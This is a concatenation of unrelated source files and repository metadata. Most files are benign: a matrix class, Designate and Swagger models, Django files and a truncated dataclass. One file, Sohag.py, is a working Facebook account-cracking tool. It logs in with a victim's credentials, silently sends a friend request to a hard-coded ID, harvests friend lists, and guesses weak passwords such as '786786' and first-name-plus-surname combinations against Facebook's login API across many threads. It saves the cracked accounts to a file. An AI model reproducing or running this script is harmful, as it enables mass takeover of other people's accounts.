self.m = np.array(mv, dtype=np.float32)
def set_rot_y(self, angle):
""" Set matrix with rotation around y axis.
Arguments:
angle: Float, (radian) angle
"""
s = math.sin(angle)
c = math.cos(angle)
mv = [[ c, 0.0, s, 0.0],
[0.0, 1.0, 0.0, 0.0],
[ -s, 0.0, c, 0.0],
[0.0, 0.0, 0.0, 1.0]]
self.m = np.array(mv, dtype=np.float32)
def set_rot_z(self, angle):
""" Set matrix with rotation around y axis.
Arguments:
angle: Float, (radian) angle
"""
s = math.sin(angle)
c = math.cos(angle)
mv = [[ c, -s, 0.0, 0.0],
[ s, c, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 1.0]]
self.m = np.array(mv, dtype=np.float32)
def get_axis(self, axis_index):
""" Get specified axis of this matrix.
Arguments:
axis: Integer, index of axis
Returns:
Numpy float ndarray: length 3
"""
v = []
for i in range(3):
v.append(self.m[i, axis_index])
return np.array(v)
def invert(self):
""" Returns inverted matrix.
Returns:
Matrix4, inverted matrix
"""
        m_inv = np.linalg.inv(self.m)
mat = Matrix4()
mat.m = m_inv
return mat
def mul(self, mat):
""" Returns multiplied matrix.
Returns:
            Matrix4, multiplied matrix
"""
m_mul = self.m.dot(mat.m)
mat = Matrix4()
mat.m = m_mul
return mat
def get_raw_gl(self):
""" Returns OpenGL compatible (column major) array representation of the matrix.
Returns:
Float array
"""
m_ret = np.transpose(self.m)
return m_ret.reshape([16])
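# --- Minimal usage sketch (illustrative addition, not in the original module) ---
# Compose a rotation with a translation and transform a point; the expected
# values follow from the definitions above.
if __name__ == '__main__':
    rot = Matrix4()
    rot.set_rot_z(math.pi / 2)             # 90 degrees about the z axis
    trans = Matrix4()
    trans.set_trans([1.0, 0.0, 0.0])
    m = trans.mul(rot)                     # rotate first, then translate
    print(m.transform([1.0, 0.0, 0.0, 1.0]))  # approximately [1, 1, 0, 1]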
|
[
"miyoshi@narr.jp"
] |
miyoshi@narr.jp
|
7bc66b3bb4047b08d2b5347d0379f37a95407091
|
a58fcf9467749de7d269c5b17430773069e29791
|
/designate/objects/service_status.py
|
e86ecd0908900c849ea30b5ff0c75a61ffe20377
|
[
"Apache-2.0"
] |
permissive
|
Woody89/designate-private
|
586df6c28a2da573663487e4728c3fddfef095af
|
0a6ed5a1d7cdac5cb1e9dec8fd3ddfb9a77c58f5
|
refs/heads/master
| 2021-01-22T19:22:49.391876
| 2017-08-19T06:16:53
| 2017-08-19T06:16:53
| 100,774,211
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,716
|
py
|
# Copyright 2016 Hewlett Packard Enterprise Development Company LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from designate.objects import base
class ServiceStatus(base.PersistentObjectMixin,
base.DictObjectMixin,
base.DesignateObject):
FIELDS = {
"service_name": {
"schema": {
"type": "string"
}
},
"hostname": {
"schema": {
"type": "string"
}
},
"heartbeated_at": {
"schema": {
'type': ['string', 'null'],
'format': 'date-time'
}
},
"status": {
"schema": {
"type": "string",
"enum": ["UP", "DOWN", "WARNING"]
}
},
"stats": {
"schema": {
"type": "object",
}
},
"capabilities": {
"schema": {
"type": "object"
}
}
}
STRING_KEYS = [
'service_name', 'hostname', 'status'
]
class ServiceStatusList(base.ListObjectMixin, base.DesignateObject):
LIST_ITEM_TYPE = ServiceStatus
|
[
"dongpzh@adtec.com.cn"
] |
dongpzh@adtec.com.cn
|
2e67ac32d4cd4f6c74bcb5822f168309c0f01a60
|
c1059f94ad075bdc646e1f28dd749574e2c21fc2
|
/Sohag.py
|
e8e0f468f2f72892cf1976cca6ae0a06bd89573e
|
[] |
no_license
|
Sohagblacktiger786/loveHackerSoHag333
|
d143402f0da1e2040f172ec45eaa80a7ec14a46f
|
62dec149b7b495a60517082d932476cef2795f2b
|
refs/heads/master
| 2022-10-01T14:54:17.574609
| 2020-05-27T06:00:24
| 2020-05-27T06:00:24
| 267,233,331
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,801
|
py
|
#!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To lovehacker
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.07)
#Dev:love_hacker
##### LOGO #####
logo = """
\033[1;91m:▒▒▒▒███▒███▒███▒███▒▒▒▒▒▒▒▒▒▒:
\033[1;92m▒▒▒▒▒▒▒▒█▒█▒█▒▒▒█▒█▒█▒▒▒▒▒▒▒▒▒▒::
\033[1;93m:▒▒▒▒▒▒███▒█▒█▒███▒█▒█▒▒▒▒▒▒▒▒▒▒:::
\033[1;94m::▒▒▒▒▒▒█▒▒▒█▒█▒█▒▒▒█▒█▒▒▒▒▒▒▒▒▒▒::::
\033[1;95m:::▒▒▒▒▒▒███▒███▒███▒███▒▒▒▒▒▒▒▒▒▒:::::
\033[1;96m::♧♧♧♧♧♧♧♧♧♧\033[1;91mWhatsapp\033[1;96m♧♧♧♧♧♧♧♧♧♧▒▒▒▒▒▒▒::::
\033[1;91m:》》》\033[1;93m+8801755974285\033[1;91m《《《▒▒▒▒▒▒▒▒▒▒▒:::::
\033[1;95m♡╭──────────•◈•──────────╮♡\033[1;96m-N S SoHag Chowdhury -\033[1;95m♡╭──────────•◈•──────────╮♡
\033[1;92m..........................BlackMafia......................
\033[1;93m╔╗ ╔╗╔═╦╦╦═╗ ╔╗╔╦═╦╦╗
\033[1;93m║║ ║╚╣║║║║╩╣ ╚╗╔╣║║║║ Bangladesh
\033[1;93m╚╝ ╚═╩═╩═╩═╝═ ╚╝╚═╩═╝
\033[1;95m♡╰──────────•◈•──────────╯♡\033[1;96mBlackMafia\033[1;95m♡╰──────────•◈•──────────╯♡"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;96m-┈┈┈┈┈┈┈┈┈┈┈╱▔▔▔▔╲┈┈┈┈┈┈┈┈
\033[1;96m┈┈┈┈┈┈┈┈┈┈┈▕▕╲┊┊╱▏▏┈┈┈┈┈┈┈
\033[1;96m┈┈┈┈┈┈┈┈┈┈┈▕▕▂╱╲▂▏▏┈┈┈┈┈┈┈
\033[1;96m ┈┈┈┈┈┈┈┈┈┈┈┈╲┊┊┊┊╱┈┈┈┈┈┈┈┈
\033[1;96m ┈┈┈┈┈┈┈┈┈┈┈┈▕╲▂▂╱▏┈┈┈┈┈┈┈┈
\033[1;96m ┈┈┈┈┈┈┈┈╱▔▔▔▔┊┊┊┊▔▔▔▔╲┈┈┈┈
\033[1;96m ─────────────•◈•──────────
\033[1;92m███████▒▒Welcome To N S SoHag Chowdhury ▒▒████████
\033[1;95m♡╭──────────•◈•──────────╮♡\033[1;96mBlackMafia\033[1;95m♡╭──────────•◈•──────────╮♡
\033[1;94mAuthor\033[1;91m: \033[1;91N S SoHag Chowdhury
\033[1;94mBlackMafia\033[1;91m: \033[1;91▒▓██████████████]99.9
\033[1;94mFacebook\033[1;91m: \033[1;91mlovehacker
\033[1;94mWhatsAppNum\033[1;91m: \033[1;91m+8801755974285
\033[1;95m♡╰──────────•◈•──────────╯♡\033[1;96mBlackMafia\033[1;95m♡╰──────────•◈•──────────╯♡"""
jalan(' \033[1;96m....................BlackMafiaSoHag.....................:')
jalan("\033[1;93m ┈┈┈┈┈┈┈┈╱▔▔▔▔╲┈┈┈┈┈┈┈┈ ")
jalan('\033[1;93m ┈┈┈┈┈┈┈▕▕╲┊┊╱▏▏┈┈┈┈┈┈┈ ')
jalan('\033[1;93m ┈┈┈┈┈┈┈▕▕▂╱╲▂▏▏┈┈┈┈┈┈┈ ')
jalan("\033[1;93m ┈┈┈┈┈┈┈┈╲┊┊┊┊╱┈┈┈┈┈┈┈┈ ")
jalan("\033[1;93m ┈┈┈┈┈┈┈┈▕╲▂▂╱▏┈┈┈┈┈┈┈┈")
print "\033[1;93m♡─────╱▔▔▔▔┊┊┊┊▔▔▔▔╲───────♡\033[1;96mLogin BlackMafia\033[1;95m♡╰──────────•◈•──────────╯♡"
CorrectUsername = "sohag"
CorrectPassword = "lovehackersohag"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;91m🔐 \x1b[1;91mTool Username \x1b[1;91m»» \x1b[1;93m")
if (username == CorrectUsername):
password = raw_input("\033[1;94m🔐 \x1b[1;91mTool Password \x1b[1;91m»» \x1b[1;92m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:love_hacker
time.sleep(2)
loop = 'false'
else:
print "\033[1;91mWrong Password"
os.system('xdg-open https://m.youtube.com/channel/UCuIBFtcJZCnGEPw5XH7DQSg')
else:
print "\033[1;94mWrong Username"
os.system('xdg-open https://m.youtube.com/channel/UCuIBFtcJZCnGEPw5XH7DQSg')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
jalan(' \033[1;92mWarning: \033[1;97mDo Not Use Your Personal Account' )
jalan(' \033[1;92m Note: \033[1;97mUse a New Account To Login' )
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
print(' \033[1;94m♡\x1b[1;91m》》》》》》LOGIN WITH FACEBOOK《《《《《《\x1b[1;94m♡' )
print(' ' )
id = raw_input('\033[1;96m[+] \x1b[1;92mID/Email\x1b[1;95m: \x1b[1;96m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword\x1b[1;96m: \x1b[1;96m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;96mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;95mLogin Successful...'
os.system('xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;92mYour Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;93mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear") #Dev:love_hacker
print logo
print " \033[1;95m«-----♡----\033[1;93mLogged in User Info\033[1;95m----♡-----»"
print " \033[1;94m Name\033[1;93m:\033[1;92m"+nama+"\033[1;97m "
print " \033[1;97m ID\033[1;93m:\033[1;92m"+id+"\x1b[1;97m "
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
print "\033[1;97m--\033[1;92m> \033[1;92m1.\x1b[1;92mStart Cloning..."
print "\033[1;97m--\033[1;91m> \033[1;91m0.\033[1;91mExit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;91mChoose an Option>>> \033[1;97m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;96m--\033[1;92m> \033[1;92m1.\x1b[1;91mClone From Friend List..."
print "\033[1;96m--\033[1;92m> \033[1;92m2.\x1b[1;91mClone From Public ID..."
print "\033[1;96m--\033[1;91m> \033[1;91m0.\033[1;94mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;97m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
jalan('\033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;96m[♡] \033[1;92mEnter ID\033[1;93m: \033[1;97m")
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────╯♡"
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;93mName\033[1;93m:\033[1;97m "+op["name"]
except KeyError:
print"\x1b[1;92mID Not Found!"
raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")
super()
print"\033[1;93mGetting IDs\033[1;93m..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m"+str(len(id))
jalan('\033[1;92mPlease Wait\033[1;93m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91mCloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;94m«-----\x1b[1;93m♡To Stop Process Press CTRL+Z♡\033[1;94m----»"
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
jalan(' \033[1;93m ........Cloning Start plzzz Wait.......... ')
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass #Dev:love_hacker
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;92m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = a['first_name'] + 'rajpoot'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['first_name'] + 'mughal'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + 'malik'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + 'khan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + 'afridi'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
print " \033[1;93m«---•◈•---Developed By love---•◈•---»" #Dev:love_hacker
print '\033[1;91mProcess Has Been Completed\033[1;92m....'
print"\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
print """
...........███ ]▄▄▄▄▄▃
..▂▄▅█████▅▄▃▂
[███████████████]
◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤
♡──────────────•◈•──────────────♡.
: \033[1;96m .....lovehacker BlackMafia........... \033[1;93m :
♡──────────────•◈•──────────────♡.'
whatsapp Num
+8801755974285"""
raw_input("\n\033[1;92m[\033[1;94mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
Sohagblacktiger786.noreply@github.com
|
f8326902b0bbeae2dd43d1248ab798f698020f55
|
ec4f4aa5e22131bb094e6afc5af35dd37d68d3df
|
/python-flask/swagger_server/models/vlan_logical_single_tagged_list_config.py
|
b8a234094d459c364f2dc98d5894c6f5cb2a4629
|
[] |
no_license
|
ajragusa/OpenConfigAPI
|
e4224212dac3fb125ebff2ebedda930c9c979e71
|
485da3b2b96d568f857ccc931a86d7e7e9f3cab4
|
refs/heads/master
| 2020-05-29T23:01:05.287841
| 2019-05-30T17:16:39
| 2019-05-30T17:16:39
| 189,425,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,848
|
py
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class VlanLogicalSingleTaggedListConfig(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, vlan_ids: List[str]=None): # noqa: E501
"""VlanLogicalSingleTaggedListConfig - a model defined in Swagger
:param vlan_ids: The vlan_ids of this VlanLogicalSingleTaggedListConfig. # noqa: E501
:type vlan_ids: List[str]
"""
self.swagger_types = {
'vlan_ids': List[str]
}
self.attribute_map = {
'vlan_ids': 'vlanIds'
}
self._vlan_ids = vlan_ids
@classmethod
def from_dict(cls, dikt) -> 'VlanLogicalSingleTaggedListConfig':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The VlanLogicalSingleTaggedListConfig of this VlanLogicalSingleTaggedListConfig. # noqa: E501
:rtype: VlanLogicalSingleTaggedListConfig
"""
return util.deserialize_model(dikt, cls)
@property
def vlan_ids(self) -> List[str]:
"""Gets the vlan_ids of this VlanLogicalSingleTaggedListConfig.
:return: The vlan_ids of this VlanLogicalSingleTaggedListConfig.
:rtype: List[str]
"""
return self._vlan_ids
@vlan_ids.setter
def vlan_ids(self, vlan_ids: List[str]):
"""Sets the vlan_ids of this VlanLogicalSingleTaggedListConfig.
:param vlan_ids: The vlan_ids of this VlanLogicalSingleTaggedListConfig.
:type vlan_ids: List[str]
"""
self._vlan_ids = vlan_ids
|
[
"aragusa@globalnoc.iu.edu"
] |
aragusa@globalnoc.iu.edu
|
c7f78e163aed581952e2e9b721d54ff257144534
|
af09ba1ce23b21e8d7d95c76d9d49cd504c0baf8
|
/craigslist_clone/wsgi.py
|
7ee2f651bad3d4a336cffcb6b281244459bc03be
|
[] |
no_license
|
euhidaman/craigslist_clone
|
3ceae7a3973098521c489ff8252c881aae5bd602
|
846f290552805bdcc339f2841df940c7e3030acc
|
refs/heads/master
| 2022-12-25T00:59:12.864881
| 2020-10-04T04:19:27
| 2020-10-04T04:19:27
| 299,649,497
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for craigslist_clone project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'craigslist_clone.settings')
application = get_wsgi_application()
|
[
"aman.derax20@gmail.com"
] |
aman.derax20@gmail.com
|
52ed57756ebb7464f0ac9571c0f8add9e005d1bf
|
659db74e51e2480b3ef99387eb63f854db0b78c7
|
/api/migrations/0004_appointment.py
|
5fb0f1c8c729abc58005bd1df989b49d2aa9e179
|
[] |
no_license
|
randyjap/Python-Backend
|
7552dfed0ed6d72807b631a5aec35e86c90590e2
|
2817023e5881ee883f1e28d6882f9b0dc21ddc44
|
refs/heads/master
| 2021-01-22T05:46:54.582451
| 2017-02-20T03:49:46
| 2017-02-20T03:49:46
| 81,701,457
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 864
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-15 23:35
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0003_auto_20170215_2332'),
]
operations = [
migrations.CreateModel(
name='Appointment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('time', models.DateTimeField()),
('doctor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Doctor')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"randyjap@gmail.com"
] |
randyjap@gmail.com
|
18eaef8d089f9eaf3b0efe9ef758dfcbfa9a9590
|
26579f272bedbd5093b709618b4fe9d0b15fdfcc
|
/app/dc/player.py
|
4140479edd2787f8ff29aef258a1f2d4cc9d0219
|
[] |
no_license
|
david-wm-sanders/varvaytya-py
|
129f279a5178d7b2507413c23f228a6bab645440
|
88e36985ffaaaf1176a4e542badd2595cd0b1a99
|
refs/heads/master
| 2023-08-26T00:14:17.477922
| 2021-11-10T05:43:01
| 2021-11-10T05:43:01
| 410,693,797
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
import dataclasses
import xml.etree.ElementTree as XmlET
from .exc import XmlLoadKeyError, XmlLoadValueError
from .person import PersonDc
from .profile import ProfileDc
@dataclasses.dataclass
class PlayerDc:
hash_: int
rid: str
person: PersonDc
profile: ProfileDc
@classmethod
def from_element(cls, element: XmlET.Element):
x = element.attrib
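        # element.attrib is a plain dict of attribute name -> string value;
        # indexing with [] raises KeyError for missing attributes, which the
        # handler below turns into XmlLoadKeyError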
try:
            hash_ = int(x["hash"])
            rid = x["rid"]
# todo: more validation
except KeyError as e:
print(f"Player attribute key error: {e}")
raise XmlLoadKeyError() from e
except ValueError as e:
print(f"Player attribute value error: {e}")
raise XmlLoadValueError() from e
except Exception as e:
